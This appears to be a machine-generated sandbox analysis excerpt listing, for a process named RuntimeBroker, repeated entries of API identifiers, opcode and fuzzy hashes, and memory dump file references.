                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: TMP
                                                                                                                                                                                • API String ID: 3215553584-3125297090
                                                                                                                                                                                • Opcode ID: 56dba3dd74e4928943856274ad8f0fa5ace65e28029dffb90eccd2550b3d5261
                                                                                                                                                                                • Instruction ID: eec12ab5a893e3977e4258b210376db53ec9f3d9a13c5ea192ae9a3aae95dc09
                                                                                                                                                                                • Opcode Fuzzy Hash: 56dba3dd74e4928943856274ad8f0fa5ace65e28029dffb90eccd2550b3d5261
                                                                                                                                                                                • Instruction Fuzzy Hash: 5551A021B0864241FA7ABF2A5D016BAD291EF88BD4F88553CDE0D477B6FE3CF4514A20
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                • Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                                                                                                                                • Instruction ID: 44cedde4970058c6f7a1675d659352b431ebc2dee8cc4c07f69e308e3f1e4aab
                                                                                                                                                                                • Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                                                                                                                                • Instruction Fuzzy Hash: D4B09B10F17B45C1D61537155C552145354BF44700FD44034C40C41330DD2C11A55B10
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                                                                                                                                • Instruction ID: 0434bed1744b0405a8a64f55c96855b67432ee3e9217843464b8d34474379e62
                                                                                                                                                                                • Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                                                                                                                                • Instruction Fuzzy Hash: F7D10732B0864686E73AAF2D895027DA3A0EF4CB58F94513DCE8D476A4DF39D841CB60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                                                                                                                                • Instruction ID: 9ab2824a5d0359ef2fdf0db66fbf504d087d4161bc235b31612bc6ec7822b1d3
                                                                                                                                                                                • Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                                                                                                                                • Instruction Fuzzy Hash: B8C1B3722142F14FD299FB29E8A957A73D1F798309BD4402AEB8747F85CA3CE414DB60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                                                                                                                                • Instruction ID: 0a829034988d6a2e5bd5f8fcb378dbb5fb236ad0ce2737fcf47286a426aa1477
                                                                                                                                                                                • Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                                                                                                                                • Instruction Fuzzy Hash: C8B15B72B0868685E7769F2DC85423CBBA0E74DB48FA45139CB8E473A5CF39D851CB20
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                                                                                                                                • Instruction ID: 2363422fcdf7676f3c886a5682bfce24e5fe0755eab103034c5d1ffc51392c0a
                                                                                                                                                                                • Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                                                                                                                                • Instruction Fuzzy Hash: 3381C172B1C68186E775EF1E984036AA691EB8D794F944339DA8D47BA9CE3CD5008F20
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
                                                                                                                                                                                • Instruction ID: c0fa5a8f253200dfad2096efec2d81caf1275686767ef93818835cbffaf8f09e
                                                                                                                                                                                • Opcode Fuzzy Hash: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
                                                                                                                                                                                • Instruction Fuzzy Hash: 1261E522F1C28246F776AB2C9C102BDE681EF44770F944639D65D466F6DE6DE800EF20
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                • Instruction ID: 005b9568365a9a2fe0e20ec74e4c744a7814bb25624e1177e58c9e7a28319481
                                                                                                                                                                                • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E51A572B5865282E7369B2CC49063973A0EB4CB68F644139CE4D477B5EB3AEC43CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                • Instruction ID: 4c6ba260aca7f12910cab6e109049df224893099bb79d73d9af7f6681bb17a0c
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                • Instruction Fuzzy Hash: 32518376F18651C6E7359B2DC440238B3A0EB5DB58F646139DA4D077B4CB3AEC82CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                • Instruction ID: 477e6467fbeb155b614f5c70228f21687fab53d0bc79918765b45e9de856d424
                                                                                                                                                                                • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                • Instruction Fuzzy Hash: C2519336F1869186EB359B2DC84122873A0EB49B58F646139CE4D477B4CB7AEC93CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                • Instruction ID: e8c494f85bb50123682d31e82ba7e02448c5d47787a65a5ddfbdc250edece53a
                                                                                                                                                                                • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                • Instruction Fuzzy Hash: 1451C832B5865185E7369B2DC480638B3A1EB4CF98F649135CE4C577A4EB3AEC43CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                • Instruction ID: 6ddf3bc4f6ee85e747cbfaa79775ab6011b70b41eee7910fab2bf0a8ba9a4f62
                                                                                                                                                                                • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                • Instruction Fuzzy Hash: 6F51B272F1865285E7369B2DC440338A7A1EB49B58FA46135CE4D477B8CB3AEC93CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                • Instruction ID: 2992c19c74acb62438dcc52d75b27739b2ea2664489bc1d3045697e198609fef
                                                                                                                                                                                • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                • Instruction Fuzzy Hash: 6551B436B18A5181E7369B2CC480A3CA3A1EB4CB58F645039CE4D577A5DB3AEC82CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                • Instruction ID: 00ea9af1a7bcee566b9bf46f04e6d8b7669b453a75cb8a750873933d52db1ed0
                                                                                                                                                                                • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                • Instruction Fuzzy Hash: 3441B552F4974E05F9779B1C0D206BCA690EF1ABA0DE813B8CF99173F3CD0DA9868520
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BoundaryDeleteDescriptorErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2050971199-0
                                                                                                                                                                                • Opcode ID: 4c2069438db7bd6821668209f3bed185f6ed925e7f6c63ba07488e81febeb59c
                                                                                                                                                                                • Instruction ID: 75dccc0c82609818b01c3e12ca7f65319112d258ee41551763d53c3a2cf7cdbe
                                                                                                                                                                                • Opcode Fuzzy Hash: 4c2069438db7bd6821668209f3bed185f6ed925e7f6c63ba07488e81febeb59c
                                                                                                                                                                                • Instruction Fuzzy Hash: 6641F462B14A5582EF18DF2ADD14269B3A1FB4CFD4B899436DF0D97B68DE3CD0418700
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 27c8ce5197fab721537f96c549d365f36e8ddfeb9aabfd716177bbdff71b5849
                                                                                                                                                                                • Instruction ID: 8d8676c7c8f4dbcb279ec0951b1f22106c17a0746162f329d808d1e63a97277e
                                                                                                                                                                                • Opcode Fuzzy Hash: 27c8ce5197fab721537f96c549d365f36e8ddfeb9aabfd716177bbdff71b5849
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F31A432B19B8241E775AF2A684413EBAD5EB88B90F54423CEE5D53BA5DF3CE0114B14
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                                                                                                                                                • Instruction ID: 8b17da926192666405c7a296c4d3332443967e683a8defa4143602a576aeff1c
                                                                                                                                                                                • Opcode Fuzzy Hash: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                                                                                                                                                • Instruction Fuzzy Hash: E0F04F71A286958EDBA59F3EA80262DB7D4F708380B80C079E68983A14D67C91608F14
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                                                                                                • Instruction ID: 47ea1eecf651145d63681f368ac4097bdc2921666bfc2a2dd6c0a20e7ceca2b4
                                                                                                                                                                                • Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                                                                                                • Instruction Fuzzy Hash: 35A00121919826D4EA6AAB08ACE0135A660FB50300B801031D00D424B09F2CA502DB20
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
